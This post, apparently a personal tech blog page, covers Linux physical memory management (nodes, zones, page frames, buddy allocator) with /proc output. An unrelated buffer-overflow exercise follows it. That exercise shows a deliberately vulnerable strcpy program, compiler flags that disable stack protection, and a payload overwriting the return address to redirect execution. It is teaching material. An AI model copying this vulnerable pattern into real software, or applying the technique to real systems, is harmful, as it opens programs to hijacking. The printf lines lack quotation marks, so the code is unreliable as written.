Posts Linux Memory Management
Post
Cancel

Linux Memory Management

Memory management technic and virtual memory

  • Virtual memory offers maximum sized Virtual Address Space to each Task.

    CPUSize
    32bit4GB
    64bit16EB
    • In case of 32bit CPU, Virtual Address Space of a Task does not require the 4GB of Physical memory but takes only as much as the Task uses.
      • More tasks can run with less physical memory
      • No need of memory arrange policy
      • Easy to share or protect memory between tasks
      • Fast task creation

Physical memory management data structure

  • Linux has the information about entire physical memory.
  • UMA(Uniform Memory Access): SMP(Symmetric Multi-Processing)
    • Memory and I/O BUS are shared by entire CPUs
    • Possible bottleneck on the resource
  • NUMA(Non-Uniform Memory Access)
    • For the sake of the performance, each CPU should access to the nearest memory to fetch data.
  • Node
    • Implementation of Bank(Set of memory with the same access speed)
      • Zone structure implemented in “/include/linux/mmzone.h”
      • UMA has one Bank and NUMA has multiple Banks.
    • UMA has one Node
      • The only Node can be accessed with “contig_page_data”
    • NUMA has multiple Nodes.
      • They are managed using list called “pgdat_list”
    • Linux can access the Physical Memory using consistent Node structure no matter what the system is.
      • “pg_data_t” structure is used.
        • “node_present_pages”: actual size of the physical memory in the node
        • “node_start_pfn”: the index number of the physical memory in the memory map
        • “node_zones”: zone structure
        • “nr_zones”: the number of zones
      • For the sake of the performance
        • Linux tends to allocate the nearest memory from the CPU working on the Task.
        • Linux tends to reallocate the CPU which have worked on the same task.

      Bank-Node

  • Zone
    • Some ISA BUS-based devices are necessary to allocate the region under 16MB of the physical memory.
    • Zones are several regions of the physical memory for the Node.
      • “/include/linux/mmzone.h”
    • The memory in the same zone has the same properties.
    • The memory in the different zone should be managed separately.
    RegionZone nameDescription
    0 ~ 16MZONE_DMA or ZONE_DMA32saved for some ISA BUS-based devices
    16 ~ 896MZONE_NORMALmapped from the beginning of the Kernel Space in the Virtual Address Space (e.g. 3072 ~ 3968 M for 32bit)
    896 ~ endZONE_HIGHMEMdynamically allocated as it is needed
    • Zone can be the only one in one Node. (e.g. ARM CPU system with 64MB SDRAM)
    • Zone structure has
      • Beginning address and the size of physical memory belong to the Zone
      • free_area structure array for being used by Buddy
      • “watermark” and “vm_stat” determine appropriate memory freeing policy at memory shortage.
        • On the memory shortage, the processes failed to fetch memory are put into “wait_queue” with hashing on “wait_table” variable.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    230
    
    $ cat /proc/zoneinfo
    Node 0, zone      DMA
      per-node stats
          nr_inactive_anon 62122
          nr_active_anon 94246
          nr_inactive_file 146827
          nr_active_file 95508
          nr_unevictable 0
          nr_slab_reclaimable 6632
          nr_slab_unreclaimable 8974
          nr_isolated_anon 0
          nr_isolated_file 0
          workingset_refault 0
          workingset_activate 0
          workingset_nodereclaim 0
          nr_anon_pages 92309
          nr_mapped    38734
          nr_file_pages 300632
          nr_dirty     19570
          nr_writeback 0
          nr_writeback_temp 0
          nr_shmem     64526
          nr_shmem_hugepages 0
          nr_shmem_pmdmapped 0
          nr_anon_transparent_hugepages 88
          nr_unstable  0
          nr_vmscan_write 0
          nr_vmscan_immediate_reclaim 0
          nr_dirtied   43945
          nr_written   20874
      pages free     3721
              min      39
              low      48
              high     57
              spanned  4095
              present  3743
              managed  3721
              protection: (0, 3857, 6164, 6164)
          nr_free_pages 3721
          nr_zone_inactive_anon 0
          nr_zone_active_anon 0
          nr_zone_inactive_file 0
          nr_zone_active_file 0
          nr_zone_unevictable 0
          nr_zone_write_pending 0
          nr_mlock     0
          nr_page_table_pages 0
          nr_kernel_stack 0
          nr_bounce    0
          nr_free_cma  0
      pagesets
          cpu: 0
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
          cpu: 1
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
          cpu: 2
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
          cpu: 3
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
          cpu: 4
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
          cpu: 5
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
          cpu: 6
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
          cpu: 7
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
      node_unreclaimable:  0
      start_pfn:           1
    Node 0, zone    DMA32
      pages free     988431
              min      10549
              low      13186
              high     15823
              spanned  1044480
              present  1011712
              managed  988823
              protection: (0, 0, 2306, 2306)
          nr_free_pages 988431
          nr_zone_inactive_anon 0
          nr_zone_active_anon 0
          nr_zone_inactive_file 0
          nr_zone_active_file 0
          nr_zone_unevictable 0
          nr_zone_write_pending 0
          nr_mlock     0
          nr_page_table_pages 0
          nr_kernel_stack 0
          nr_bounce    0
          nr_free_cma  0
      pagesets
          cpu: 0
                  count: 11
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 1
                  count: 0
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 2
                  count: 0
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 3
                  count: 0
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 4
                  count: 365
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 5
                  count: 0
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 6
                  count: 16
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 7
                  count: 0
                  high:  378
                  batch: 63
      vm stats threshold: 48
      node_unreclaimable:  0
      start_pfn:           4096
    Node 0, zone   Normal
      pages free     158188
              min      6306
              low      7882
              high     9458
              spanned  619520
              present  619520
              managed  590396
              protection: (0, 0, 0, 0)
          nr_free_pages 158188
          nr_zone_inactive_anon 62122
          nr_zone_active_anon 94246
          nr_zone_inactive_file 146827
          nr_zone_active_file 95508
          nr_zone_unevictable 0
          nr_zone_write_pending 19570
          nr_mlock     0
          nr_page_table_pages 731
          nr_kernel_stack 7536
          nr_bounce    0
          nr_free_cma  0
      pagesets
          cpu: 0
                  count: 373
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 1
                  count: 333
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 2
                  count: 317
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 3
                  count: 282
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 4
                  count: 369
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 5
                  count: 327
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 6
                  count: 268
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 7
                  count: 123
                  high:  378
                  batch: 63
      vm stats threshold: 48
      node_unreclaimable:  0
      start_pfn:           1048576
    Node 0, zone  Movable
      pages free     0
              min      0
              low      0
              high     0
              spanned  0
              present  0
              managed  0
              protection: (0, 0, 0, 0)
    
  • Page frame
    • Managing unit of physical memory by Zone
    • Page structure implemented in “/include/linux/mm_types.h”
    • Pages are supposed to be created for every page frames when the system boots.
    • Pages can be accessed by the global variable called “mem_map”
  • Linux’s physical memory managing units
    • Physical memory may be composed of one or more Nodes.
    • Node may be composed of one or more Zones.
    • Zone may be composed of many Page frames.

    Node-Zone

Buddy and Slab

  • Linux allocates physical memory to tasks by the “Page frame” unit.
    • At least 4KB, which can be changed to be 8KB, 2MB, etc.
    • External Fragmentation: When task requests bigger size than several page frames and the residual is smaller than one page frame.
    • Internal Fragmentation: When task requests smaller size than one page frame.
  • Buddy Allocator
    • External Fragmentation
    • Implemented through the free_area structure array in the Zone structure (one Buddy for one Zone)
      • free_area structure has
        • free_list
        • map

        free_area

        • The number of free_area will be the number of squares of 2 which calculates the maximum number of page frames for one buddy. (e.g. 4KB, 8KB, 16KB, …, 4MB)
    • Example
      • On 2 pages are requested

        Buddy allocator procedure 1

      • On another 2 pages are requested

        Buddy allocator procedure 2

      • On page 11 are freed

        Buddy allocator procedure 3

    • Lazy Buddy

      Lazy Buddy

      • “free_area::map” -> “free_area::nr_free”: number of free Page frames
      1
      2
      3
      4
      
      $ cat /proc/buddyinfo
      Node 0, zone      DMA      1      0      0      1      2      1      1      0      0      1      3
      Node 0, zone    DMA32      3      2      4      3      6      4      4      4      3      1    963
      Node 0, zone   Normal     54    244    185    109     41     22      7      3      2      9    145
      
  • Slab Allocator
    • Internal Fragmentation

Exercise 2. Answer: Understanding Stack based buffer overflow

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#include <string.h>
#include <stdio.h>

void function2() {
  printf(Execution flow changed\n);
}

void function1(char *str){
  char buffer[5];
  strcpy(buffer, str);  // break point 1.
}                       // break point 2.

void main(int argc, char *argv[])
{
  function1(argv[1]);   // break point 3.
  printf(Executed normally\n);
}
1
gcc -g -fno-stack-protector -z execstack -o bufferoverflow overflow.c
  • -g tells GCC to add extra information for GDB
  • -fno-stack-protector flag to turn off stack protection mechanism
  • -z execstack, it makes stack executable.
1
2
3
4
$ ./bufferoverflow AAAA
Executed normally
$ ./bufferoverflow AAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
  • break point 3.

    break point 3.

  • break point 1.

    break point 1.

  • break point 2.

    break point 2.

  • Return address, EBP and ESP on function stack frame

    EBP and ESP on function stack frame

  • break point 3.

    When you overwrite the return address with As you will get segmentation fault with message 0x41414141 in ?? () in GDB. This means you successfully overwritten the return address.

    break point 3.

  • Hijacking Execution

    • Find the function2 address

      function 2 address

    • Overwrite the Return address with the function 2 address

      run with function 2 address

    1
    2
    3
    
    $ ./bufferoverflow $(python -c 'print "A"*17 + "\x1b\x84\x04\x08"')
    Execution flow changed
    Segmentation fault
    
This post is licensed under CC BY 4.0 by the author.